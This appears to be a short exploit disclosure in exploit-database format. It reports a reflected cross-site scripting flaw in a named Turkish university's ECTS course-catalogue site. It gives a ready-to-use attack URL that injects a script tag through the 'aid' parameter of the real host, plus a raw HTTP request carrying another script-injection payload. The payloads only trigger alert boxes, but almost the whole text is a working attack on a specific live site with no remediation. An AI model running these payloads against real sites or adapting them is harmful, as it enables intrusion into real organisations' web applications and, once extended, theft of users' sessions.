# Exploit Title: izmir ekonomi üniversitesi XSS
# Date: 20.01.2020
# Exploit Author: Furkan Özer
# Vendor Homepage: https://ects.ieu.edu.tr/

Link##: https://ects.ieu.edu.tr/new/akademik.php?aid=%22%3E%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E


# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1